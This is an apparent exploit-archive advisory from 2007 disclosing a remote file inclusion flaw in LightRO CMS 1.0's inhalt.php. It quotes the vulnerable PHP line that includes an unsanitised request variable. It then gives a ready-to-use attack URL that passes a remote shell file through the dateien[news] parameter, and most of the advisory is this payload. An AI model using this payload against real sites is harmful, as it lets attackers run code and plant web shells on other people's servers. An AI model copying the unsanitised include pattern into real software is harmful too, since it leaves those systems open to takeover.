id: 1481
date: 02/06/2007
title: LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability
author: ajann
cves: 

==============================================================
LightRO CMS 1.0 (inhalt.php) Remote File Include Vulnerability
==============================================================




*******************************************************************************
# Title   :  LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include $dateien['news'];
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]

Example:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-23]  #